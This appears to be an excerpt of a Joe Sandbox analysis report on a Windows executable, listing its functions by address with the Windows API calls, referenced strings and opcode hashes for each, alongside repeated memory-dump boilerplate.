Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 081b1eaad056d286e6c7777dfeb979cd348d5dbdb90e492c99d6b6b9fa159238
Instruction ID: bc7875d0bde9affeaf68287894fc58dbc317caa784b6532cd483d3ecfe48a698
Opcode Fuzzy Hash: 081b1eaad056d286e6c7777dfeb979cd348d5dbdb90e492c99d6b6b9fa159238
Instruction Fuzzy Hash: 48A011AA2AC202BC300B32003C0BCBA032CC0C0B20330888AF20B880C2AA800C082230

Function 0038DC4E Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038DC36

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a216d03a72b8492cdc7905a468eaf88bba3b2e7737362ad3b58553d9adbe7a1f
Instruction ID: 25fc54fe31fcf3dcf45bc2775657cdbdfe517e8b0061cf8b0f759830426fc167
Opcode Fuzzy Hash: a216d03a72b8492cdc7905a468eaf88bba3b2e7737362ad3b58553d9adbe7a1f
Instruction Fuzzy Hash: 9CA0029556D3027C710E75517D16D76437CC4C5B513304959F50A944D165845C455531

Function 0038DC44 Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0038DC36

Part of subcall function 0038DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0038DFD6
Part of subcall function 0038DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0038DFE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: a00e5133e0b827736f50e9e913caabb9c5b44b247f86172d97f27391ef8abca7
Instruction ID: 25fc54fe31fcf3dcf45bc2775657cdbdfe517e8b0061cf8b0f759830426fc167
Opcode Fuzzy Hash: a00e5133e0b827736f50e9e913caabb9c5b44b247f86172d97f27391ef8abca7
Instruction Fuzzy Hash: 9CA0029556D3027C710E75517D16D76437CC4C5B513304959F50A944D165845C455531

Function 0038A322 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetCurrentDirectoryW.KERNELBASE(?,0038A587,C:\Users\user\Desktop,00000000,003B946A,00000006), ref: 0038A326

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: CurrentDirectory
String ID:
API String ID: 1611563598-0
Opcode ID: 7c414d3d908cdf93c1b24e15c0a08b1576efeed8b61b4839936e92c9d273db5a
Instruction ID: b604fb91b8388a36f9ef27750247e7e47ff0e4d517a54f71868df6b8a67c0d8e
Opcode Fuzzy Hash: 7c414d3d908cdf93c1b24e15c0a08b1576efeed8b61b4839936e92c9d273db5a
Instruction Fuzzy Hash: 9FA01230194006568A011B30CC09C1576549761702F0086207002C00A0CB308814A501

Function 003796D0 Relevance: 1.3, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(000000FF,?,?,0037968F,?,?,?,?,003A1FA1,000000FF), ref: 003796EB

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 9a14de8956223aeae4a929d610040271b97f415481213f3a2c67e5ddfdb508ae
Instruction ID: f75ceccbb7773c108a3ca7a8a9873fc739040886efaac2d7a87f3742186e47b6
Opcode Fuzzy Hash: 9a14de8956223aeae4a929d610040271b97f415481213f3a2c67e5ddfdb508ae
Instruction Fuzzy Hash: 3DF0BE30186B008FDB328A20C548792B7E99B12335F04DB1F90EB038A09768A84D8B00

Non-executed Functions

Function 0038B8E0 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0037130B: GetDlgItem.USER32(00000000,00003021), ref: 0037134F
Part of subcall function 0037130B: SetWindowTextW.USER32(00000000,003A35B4), ref: 00371365

SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0038B971
EndDialog.USER32(?,00000006), ref: 0038B984
GetDlgItem.USER32(?,0000006C), ref: 0038B9A0
SetFocus.USER32(00000000), ref: 0038B9A7
SetDlgItemTextW.USER32(?,00000065,?), ref: 0038B9E1
SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0038BA18
FindFirstFileW.KERNEL32(?,?), ref: 0038BA2E
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0038BA4C
FileTimeToSystemTime.KERNEL32(?,?), ref: 0038BA5C
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0038BA78
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0038BA94
_swprintf.LIBCMT ref: 0038BAC4

Part of subcall function 0037400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0037401D

SetDlgItemTextW.USER32(?,0000006A,?), ref: 0038BAD7
FindClose.KERNEL32(00000000), ref: 0038BADE
_swprintf.LIBCMT ref: 0038BB37
SetDlgItemTextW.USER32(?,00000068,?), ref: 0038BB4A
SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0038BB67
FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0038BB87
FileTimeToSystemTime.KERNEL32(?,?), ref: 0038BB97
GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0038BBB1
GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0038BBC9
_swprintf.LIBCMT ref: 0038BBF5
SetDlgItemTextW.USER32(?,0000006B,?), ref: 0038BC08
_swprintf.LIBCMT ref: 0038BC5C
SetDlgItemTextW.USER32(?,00000069,?), ref: 0038BC6F

Part of subcall function 0038A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0038A662
Part of subcall function 0038A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,003AE600,?,?), ref: 0038A6B1

Strings

REPLACEFILEDLG, xrefs: 0038B907
%s %s, xrefs: 0038BB29, 0038BC4E
%s %s %s, xrefs: 0038BAB2, 0038BBE7

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
String ID: %s %s$%s %s %s$REPLACEFILEDLG
API String ID: 797121971-1840816070
Opcode ID: 9dd10570f610a25e8e346bb3d954daec420d7a4858f048ed5b0501e34767692a
Instruction ID: 7a92da6dfb62551934cd3e2fe6e705a8a090612be2f720dd689fff61016c1355
Opcode Fuzzy Hash: 9dd10570f610a25e8e346bb3d954daec420d7a4858f048ed5b0501e34767692a
Instruction Fuzzy Hash: 259184B2148349BFD632ABA0DC49FFBB7ACEB4A700F044819F749D6091D775A6058B72

Function 0037718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00377191
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 003772F1
CloseHandle.KERNEL32(00000000), ref: 00377301

Part of subcall function 00377BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00377C04
Part of subcall function 00377BF5: GetLastError.KERNEL32 ref: 00377C4A
Part of subcall function 00377BF5: CloseHandle.KERNEL32(?), ref: 00377C59

CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0037730C
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0037741A
DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00377446
CloseHandle.KERNEL32(?), ref: 00377457
GetLastError.KERNEL32 ref: 00377467
RemoveDirectoryW.KERNEL32(?), ref: 003774B3
DeleteFileW.KERNEL32(?), ref: 003774DB

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 003771BC
SeRestorePrivilege, xrefs: 003771B2
UNC\, xrefs: 0037723C
\??\, xrefs: 00377217

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3935142422-3508440684
Opcode ID: a7eb47e209227a6320130b9f8ff595a8ee1511e9dbcdd51fbed01e5bd0d1d064
Instruction ID: aa86d1d8c3ea19b3bddf301b9f6a4dc4f2400268725c7727464df52deba96182
Opcode Fuzzy Hash: a7eb47e209227a6320130b9f8ff595a8ee1511e9dbcdd51fbed01e5bd0d1d064
Instruction Fuzzy Hash: B0B1E571904215ABDF32DFA4DC45BEE77B8EF05300F0085A9F949EB152D738AA49CB61

Function 00373281 Relevance: 12.9, APIs: 4, Strings: 3, Instructions: 608COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0037328A
_memcmp.LIBVCRUNTIME ref: 00373377

Strings

hc%u, xrefs: 0037367B
h%u, xrefs: 0037362D
CMT, xrefs: 00373990

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: H_prolog_memcmp
String ID: CMT$h%u$hc%u
API String ID: 3004599000-3282847064
Opcode ID: 9e4a1d2903cf54d40967efb66d2e9e5c20dfb66012688c43ebc56781860f044d
Instruction ID: 4cb2d8cfc6a73533202204e21ead47c171a03e9146b08c1949dff17a648f621c
Opcode Fuzzy Hash: 9e4a1d2903cf54d40967efb66d2e9e5c20dfb66012688c43ebc56781860f044d
Instruction Fuzzy Hash: 3A32B6715102849FDF26DF34C896AEA37A5AF15300F05847DFD8E8F282DB789A48DB61

Function 0039D00E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0039D154

Strings

1#IND, xrefs: 0039E34C
1#SNAN, xrefs: 0039E353
1#QNAN, xrefs: 0039E35A
1#INF, xrefs: 0039E361

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 2611b449cf4108e4448fb0a52f67fa9198574ea5865a0c836c05b2845b654523
Instruction ID: c3bf1be023dc59fff2919b6f70d32a6150cabfdd8236e293436a1d61235c2432
Opcode Fuzzy Hash: 2611b449cf4108e4448fb0a52f67fa9198574ea5865a0c836c05b2845b654523
Instruction Fuzzy Hash: 21C23972E086288FDF26DE28DD417EAB7B9EB44305F1545EAD44EE7240E774AE818F40

Function 003727E8 Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 794COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 003727F1
_strlen.LIBCMT ref: 00372D7F

Part of subcall function 0038137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0037B652,00000000,?,?,?,00010432), ref: 00381396

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00372EE0

Strings

CMT, xrefs: 00372F13

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
String ID: CMT
API String ID: 1706572503-2756464174
Opcode ID: d9453dd47ac15aba3e70a7c0012674d0e44e47fcd44fa92755fa85a56f8fa224
Instruction ID: d4bf5a26ad75b4eeafb6f387a74e0a74b3bd9bd78a414cdc1f0c942822f5ee57
Opcode Fuzzy Hash: d9453dd47ac15aba3e70a7c0012674d0e44e47fcd44fa92755fa85a56f8fa224
Instruction Fuzzy Hash: D762F2715102448FDF3ADF24C8856EA3BE1AF59300F09857DED9E8F282DB79A945CB50

Function 0039866F Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00398767
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00398771
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0039877E

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: b5efb41387f195808edda75125ea004756aa2b02bd36e086e4941e46ba0f9dc7
Instruction ID: eab6cd992c591ca5d0cfa8594c2a2e3cbfc8e7f05ea2951368d9449f365fc75b
Opcode Fuzzy Hash: b5efb41387f195808edda75125ea004756aa2b02bd36e086e4941e46ba0f9dc7
Instruction Fuzzy Hash: B031C6759013289BCB22EF64D889B9CB7B8BF49310F5041EAF90CA7251EB749F858F45

Function 0039AAA8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON

Download Yara Rule

Strings

., xrefs: 0039AC3B

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID:
String ID: .
API String ID: 0-248832578
Opcode ID: 6b672a0cf74f0a63ad97f9f2edd537d5fb34463edd8d57f797df2ff437b1003e
Instruction ID: 3ee5dcc57e6dbf3f065177142a83cd9b5faa8bba679c074dd690f4cc5f477ea7
Opcode Fuzzy Hash: 6b672a0cf74f0a63ad97f9f2edd537d5fb34463edd8d57f797df2ff437b1003e
Instruction Fuzzy Hash: E1310472800209AFDF269E79CC84EFB7BBEDB86314F0502A8F418D7251E6309D44CBA0

Function 0039CB60 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
Instruction ID: 7eff451a8ebea924f0e37617e573f631e9dd0af2705e28fac84c0ef4c51f1db0
Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
Instruction Fuzzy Hash: E7021C71E102199BDF15CFA9C8806AEBBF5FF48314F25416AE919EB384D731AD41CB90

Function 0038A63C Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0038A662
GetNumberFormatW.KERNEL32(00000400,00000000,?,003AE600,?,?), ref: 0038A6B1

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: d4b6693f047e635046ba02cf41f796e6ad02653512549a70641ef16f1b9cd6b8
Instruction ID: f94c9d73743afcdf363d6b72219dad19575eee5875e3874dcc1e45c1ca0c6f8c
Opcode Fuzzy Hash: d4b6693f047e635046ba02cf41f796e6ad02653512549a70641ef16f1b9cd6b8
Instruction Fuzzy Hash: 67017136140308BFD7129F64DC45F9B77BCEF1A710F008822FA04D7160D3709A158BA5

Function 00376EC9 Relevance: 3.0, APIs: 2, Instructions: 17windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(0038117C,?,00000200), ref: 00376EC9
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00376EEA

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: c87c2447e643ea34951d9511c842d428f7f944040557fa3292a7a11743d68d1e
Instruction ID: 72a71d77f0d2c305326165055532777101d658e4bf7c8a2fe827bc5bdca2898f
Opcode Fuzzy Hash: c87c2447e643ea34951d9511c842d428f7f944040557fa3292a7a11743d68d1e
Instruction Fuzzy Hash: B6D0C7353C4302FFEA624A74CD06FA77B5C6757B82F10D514B357E98D0C57090149625

Function 003A1194 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,003A118F,?,?,00000008,?,?,003A0E2F,00000000), ref: 003A13C1

Memory Dump Source

Source File: 00000000.00000002.2032031411.0000000000371000.00000020.00000001.01000000.00000003.sdmp, Offset: 00370000, based on PE: true

Associated: 00000000.00000002.2031502272.0000000000370000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032104721.00000000003A3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032120800.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2032170143.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_370000_CPYEzG7VGh.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 417e9279a840aef245c69decec6b3f0fad81305ffbf7aef908e895633383a3e6
Instruction ID: a20aad904d8f637b17429735e8fd9143743e9c7137f05142c42c98f79a0b65cb
Opcode Fuzzy Hash: 417e9279a840aef245c69decec6b3f0fad81305ffbf7aef908e895633383a3e6
Instruction Fuzzy Hash: 0DB14E356106089FDB16CF2CC48AB657BE0FF4A364F268658E999CF2E1C335E991CB40

Function 0037407E Relevance: 1.6, Strings: 1, Instructions: 332COMMON

Download Yara Rule

Strings

gj, xrefs: 003740C1

